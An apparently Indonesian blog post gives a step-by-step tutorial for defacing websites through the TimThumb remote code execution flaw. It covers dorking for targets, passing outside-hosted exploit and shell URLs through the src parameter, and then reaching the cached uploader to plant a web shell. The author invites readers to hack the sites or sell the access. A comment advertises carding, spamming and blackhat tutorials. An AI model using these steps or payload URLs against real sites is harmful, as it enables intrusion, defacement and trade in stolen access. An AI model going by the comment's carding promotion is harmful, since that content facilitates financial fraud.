Breaking

Wednesday, 27 February 2019

Deface timthumb

Cara deface exploit timthumb rce (remote code execution)


Halo kawan :). Kali ini admin gans mau memberikan tutorial deface dengan metode Timthumb RCE. Ingat poc ini cuma bisa bekerja pada Timthumb versi 2.0 kebawah. Langsung aja simak.

Dork:
Monggo dicomot mas

Untuk exploitnya ambil aja neh gan
Exploit by me xD: http://flickr.com.irfanmuhluster.web.id/upgan.php

1. Gunakan dork untuk cari target lalu cari target dengan menggunakan dork diatas di google
2. Tambahkan timthumb.php di target mu contoh targetmu.com/wp-content/themes/eNews/timthumb.php atau targetmu.com/timthumb.php
3. Cek versi timthumb jika versi 2.0 keatas skip aja h3h3h3
4. Masukan exploitnya > http://flickr.com.irfanmuhluster.web.id/upgan.php contoh targetmu.com/timthumb.php?src=http://flickr.com.irfanmuhluster.web.id/upgan.php
5. Jika berhasil maka akan muncul seperti ini
6. Akses uploadernya caranya salin di bagian /cache/random_nomor.php > ganti timthumb.php dengan /cache/random_nomor.php
Contoh: targetmu.com/cache/random_nomor.php
7. Tinggal upload shell kesayangan mu :D
Terakhir terserah kalian mau apain mau di hek jg boleh hehehe mau jual aksesna jg boleh hehehe
Update! :
Klo exploit/payload diatas gk iso silakan pake yg baru http://flickr.com.tvcw.org/shell.php atau kelen bisa bikin sendiri exploitnya

Sekian tutorial dari ku :)


1 comment:

  1. keren gan,, kunjungi juga blog Aurealisa di aurealisa.blogspot.com

    - kumpulan game mod
    - tutorial carding
    - carding ebay
    - carding amazon
    - spammer
    - defacer
    - Tutorial
    - Website Order
    - Daily
    - Blackhat
    DLL

    ReplyDelete